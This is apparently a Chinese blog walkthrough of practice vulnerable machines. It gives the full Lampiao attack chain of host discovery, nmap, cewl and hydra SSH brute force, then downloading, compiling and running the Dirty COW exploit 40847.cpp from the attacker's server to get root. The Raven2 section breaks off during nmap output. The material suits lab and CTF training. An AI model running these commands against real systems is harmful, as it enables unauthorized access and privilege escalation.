Linux靶机练习

文章目录

  • 第1次 Lampiao
  • 1.信息收集
    • 1.1 netdiscover扫描
    • 1.2 namp扫描
      • 第1次扫描
      • 第2次扫描
    • 1.3 御剑扫描
      • 打开扫描到的文件
      • 打开登录网站
        • sql注入
        • 链接跳转
          • node/1
          • node/3
          • node/2
  • 2. 漏洞探测
    • 2.1 利用cewl获取网站信息
    • 2.2 ssh进行登录
      • 查看靶机信息:
  • 3. 提权
    • 3.1 利用脏牛提权
    • 3.2 对40847文件的操作
    • 3.3 tiago用户下载40847.cpp文件
    • 3.4 获取root权限
      • 找到flag.txt文件
  • 第2次 Raven2
  • 1 信息搜集
    • 1.1 获得ip地址
    • 1.2 nmap进行扫描
    • 1.3 御剑扫描
      • 第1个网址信息
        • 添加hosts文件项
    • 1.4 扫描目录
      • 1.4.1 http://raven.local/vendor/ 信息
        • flag1
      • 1.4.2 PHPmailer邮件及版本
      • 1.4.3 http://raven.local/wordpress/信息
        • 使用dirb扫描目录
        • 找到flag3
      • 1.4.4 http://raven.local/manual/信息
    • 1.5 信息整理
      • 第2个网址信息
  • 2. 漏洞探测
    • 2.1 PHPmailer 5.2.16漏洞
    • 2.2 **CVE-2016-10033远程代码执行漏洞**
  • 3 漏洞利用(反弹shell)
    • 3.1 phpmailer**CVE-2016-10033远程代码执行漏洞利用**
    • 3.2 MSF配置
    • 3.3 获得shell权限
      • flag2
      • 切换终端
      • 获得MySQL账号密码
    • 3.4 提权 mysql udf
      • 查看插件所在路径
      • 使用metasploit自带的动态链接库
        • 寻找动态链接库
    • 3.5 下载动态链接库到靶机
      • shell里面的操作
      • 创建数据表myfunc
      • 改变find命令权限
  • 4. 提权
    • 4.1 使用find命令提权
    • 4.2 flag4文件
  • 第3次 Tr0ll
  • 1.信息搜集
    • 1.1主机发现
    • 1.2端口扫描
    • 3.用御剑进行扫描
  • 2.漏洞探测
      • 2.1 ftp登录
      • 2.2进入ftp
      • 2.3 ftp中的操作
  • 3.getshell
      • 3.1 python建立反弹shell脚本
      • 3.2Getshell:
  • 4.提权
    • kali启动服务器:
    • 下载
  • 第4次 服务器 192.168.1.19
  • 1.信息搜集
    • 1.1御剑扫描
    • 1.2 nmap扫描
    • 1.3 kali扫描
    • 1.4 服务识别
  • 2.漏洞探测
    • 2.1 网址
    • 2.2 通达OA版本识别
    • 2.3 永恒之蓝探测
    • 2.4 通达OA getshell
      • 蚁剑连接
  • 3.后渗透阶段-信息收集
      • 3.1内网信息收集
      • 3.2 msfvenom 生成木马 获取shell
      • 3.3 *联动CS上线(可选):
  • 第5次 zico2
  • 1.信息收集
    • 1.1 主机发现
    • 1.2 端口扫描
    • 1.3 端口服务识别
    • 1.4 御剑扫描
  • 2.漏洞探测
    • 2.1 网页探测
    • 2.2 目录扫描
    • 2.3 漏洞利用
  • 3.getshell
    • 3.1 文件包含漏洞getshell
    • 3.2 中国蚁剑连接
  • 4.提取
    • 4.1 木马文件生成
    • 4.2-1 返回到根目录
    • 4.3 ssh登录
    • 4.2-2 把payload上传到目标机器
        • 开启临时服务器
  • 第6次 DC-6
  • 1.信息收集
    • 1.1 主机发现
    • 1.2 端口扫描
    • 1.3 端口服务识别
    • 1.4 御剑扫描
    • 1.5 目录扫描
  • 2.漏洞探测
    • 2.1 枚举用户
    • 2.2 生成密码
    • 2.3 暴力破解
  • 3.getshell
    • 3.1 登录wordpress
    • 3.2 getshell
  • 4.提权
    • 4.1 远程连接
    • 4.2 找到新用户的账户密码
  • 5.获取flag
  • 第7次 DC-9
  • 1.信息收集
    • 1.1 主机发现
    • 1.2 端口扫描
    • 1.3 端口服务识别
    • 1.4 御剑扫描
  • 2.漏洞探测
    • 2.1 SQL注入
    • 2.2 sqlmap获得数据库
      • 查看users数据库
    • 2.3 判断字段数
    • 2.4 爆库
    • 2.5 爆表
    • 2.6 MD5解码
    • 2.7 登录
    • 2.8 敲开22端口
  • 3.getshell
    • 3.1 hydra爆破SSH账户
    • 3.2 ssh登录
  • 4.提权
    • 4.1 查看用户sudo权限
    • 4.2 查看test.py文件
    • 4.3 构造用户实现提权
    • 4.2 查看test.py文件
    • 4.3 构造用户实现提权

第1次 Lampiao

1.信息收集

1.1 netdiscover扫描

安装好靶机之后,有个账户密码登录,但我们并不知道账户和密码,所以我们用kali进行扫描其ip地址

Linux靶机练习_第1张图片

用命令进行扫描

netdiscover

得到IP地址:

192.168.81.139

Linux靶机练习_第2张图片

1.2 namp扫描

命令如下:

第1次扫描

发现了2个端口,22和80

nmap -T4 -A -v 192.168.81.139

Linux靶机练习_第3张图片

Linux靶机练习_第4张图片

连接密码:

ssh-hostkey:
|   1024 46:b1:99:60:7d:81:69:3c:ae:1f:c7:ff:c3:66:e3:10 (DSA)
|   2048 f3:e8:88:f2:2d:d0:b2:54:0b:9c:ad:61:33:59:55:93 (RSA)
|   256 ce:63:2a:f7:53:6e:46:e2:ae:81:e3:ff:b7:16:f4:52 (ECDSA)
|_  256 c6:55:ca:07:37:65:e3:06:c1:d6:5b:77:dc:23:df:cc (ED25519)

Linux靶机练习_第5张图片

第2次扫描

发现了3个端口,22、80和1898

nmap -p- -A -sV 192.168.81.139

Linux靶机练习_第6张图片

1.3 御剑扫描

扫描1898端口出来了信息

http://192.168.81.139:1898

Linux靶机练习_第7张图片

扫描的信息如下

http://192.168.81.139:1898/robots.txt
http://192.168.81.139:1898/includes/
http://192.168.81.139:1898/misc/
http://192.168.81.139:1898/index.php
http://192.168.81.139:1898/install.php

打开扫描到的文件

http://192.168.81.139:1898/robots.txt

可以看到下面文件中包含很多信息,并且含有路径信息,可以看到有一个更新日志文件

Disallow: /CHANGELOG.txt

打开这个文件

http://192.168.81.139:1898/CHANGELOG.txt

Linux靶机练习_第8张图片

robots.txt文件内容

#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used:    http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/robotstxt.html

User-agent: *
Crawl-delay: 10
# CSS, JS, Images
Allow: /misc/*.css$
Allow: /misc/*.css?
Allow: /misc/*.js$
Allow: /misc/*.js?
Allow: /misc/*.gif
Allow: /misc/*.jpg
Allow: /misc/*.jpeg
Allow: /misc/*.png
Allow: /modules/*.css$
Allow: /modules/*.css?
Allow: /modules/*.js$
Allow: /modules/*.js?
Allow: /modules/*.gif
Allow: /modules/*.jpg
Allow: /modules/*.jpeg
Allow: /modules/*.png
Allow: /profiles/*.css$
Allow: /profiles/*.css?
Allow: /profiles/*.js$
Allow: /profiles/*.js?
Allow: /profiles/*.gif
Allow: /profiles/*.jpg
Allow: /profiles/*.jpeg
Allow: /profiles/*.png
Allow: /themes/*.css$
Allow: /themes/*.css?
Allow: /themes/*.js$
Allow: /themes/*.js?
Allow: /themes/*.gif
Allow: /themes/*.jpg
Allow: /themes/*.jpeg
Allow: /themes/*.png
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/

打开登录网站

直接加端口号就进入了这个网站

http://192.168.81.139:1898/

Linux靶机练习_第9张图片

sql注入

未能成功

1'

Linux靶机练习_第10张图片

链接跳转

发现两处可以跳转

Linux靶机练习_第11张图片

node/1

跳转后的网址如下:

http://192.168.81.139:1898/?q=node/1

Linux靶机练习_第12张图片

node/3
http://192.168.81.139:1898/?q=node/3

发现有一个音频文件和一句话:Node 2 is not working

Linux靶机练习_第13张图片

打开音频文件

并未有任何有用的信息

http://192.168.81.139:1898/LuizGonzaga-LampiaoFalou.mp3
node/2

把node/3,改为node/2

得到一个音频文件和一个图片

http://192.168.81.139:1898/?q=node/2
audio.m4a
qrc.png

Linux靶机练习_第14张图片

打开音频文件

http://192.168.81.139:1898/audio.m4a

打开图片

http://192.168.81.139:1898/qrc.png

发效了一个二维码

扫描之后,发现信息如下:

Try harder!muahuahua

Linux靶机练习_第15张图片

2. 漏洞探测

2.1 利用cewl获取网站信息

利用cewl获取网站关键信息从而生成一个密码字典:

cewl http://192.168.81.139:1898 -w lampiao.txt

image-20220228111522755

hydra对用户密码进行爆破

利用hydra对用户tiago密码进行爆破:

hydra -l tiago -P lampiao.txt 192.168.81.139 ssh

得到账户密码:

login: tiago   
password: Virgulino

Linux靶机练习_第16张图片

2.2 ssh进行登录

利用ssh进行登录:

ssh [email protected]

根据提示输入

yes
Virgulino (这个就是密码)

Linux靶机练习_第17张图片

查看靶机信息:

uname -a

Linux靶机练习_第18张图片

3. 提权

3.1 利用脏牛提权

用Kali 自带的漏洞搜索有无能进行脏牛提权的shell:

searchsploit dirty

Linux靶机练习_第19张图片

开启临时服务器

  • 将40847.cpp文件复制到当前目录下
  • 并且利用 python2 -m SimpleHTTPServer 1234
  • 开启临时的建议服务器

注意事项

  • 因此使用Python2时要特别注明,
  • 如果没安装Python3则不用特殊注明,
  • Python3无法利用该方法开启简易服务器,
    • 另外,开启服务器后默认的访问目录
      • 为当前开启服务器的目录,
      • 即我在 ~/桌面 这个目录下,
      • 则在浏览器中访问的话则默认能看 ~/桌面 目录下的文件。

3.2 对40847文件的操作

查找40847.cpp文件

find / -name 40847.cpp

拷贝40847.cpp文件

把文件复制到要定义的服务目录下

cp /usr/share/exploitdb/exploits/linux/local/40847.cpp  /home/xxb1/

image-20220228134343291

使用下面命令时,要在

/home/xxb1/        目录下使用
python2 -m SimpleHTTPServer 1234 

Linux靶机练习_第20张图片

3.3 tiago用户下载40847.cpp文件

在刚才ssh登录的tiago用户的/tmp目录下下载40847.cpp文件:

wget http://192.168.81.131:1234/40847.cpp
#ip地址改为自己的kali的IP

Linux靶机练习_第21张图片

对40847.cpp文件进行编译:

g++ -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil

./40847   #这个是-o 后面的那个名字,可自定义

解释:

  • -O2 :表示编译器的优化选项,
  • -std=c++11:表示按照c++ 2011标准来编译,
  • -pthread :是指利用到多线程时需要用到的库(我也不知道为啥要加上这个参数,希望评论区有大神能指出)
  • -o name :中name表示生成的文件的名字

Linux靶机练习_第22张图片

3.4 获取root权限

获取到了root的密码:

dirtyCowFun

再利用ssh登录:

ssh [email protected]  

发现登陆后已经是root了

Linux靶机练习_第23张图片

找到flag.txt文件

内容如下:

9740616875908d91ddcdaa8aea3af366

Linux靶机练习_第24张图片

第2次 Raven2

1 信息搜集

1.1 获得ip地址

打开kali输入下面的命令

netdiscover

得到IP地址为

192.168.81.140

Linux靶机练习_第25张图片

1.2 nmap进行扫描

nmap -sS -sV -T5 -A -p- 192.168.81.140

可以看到有4个端口是开放的

PORT       STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p

你可能感兴趣的:(Linux,Web安全,靶机练习,安全,网络安全,linux)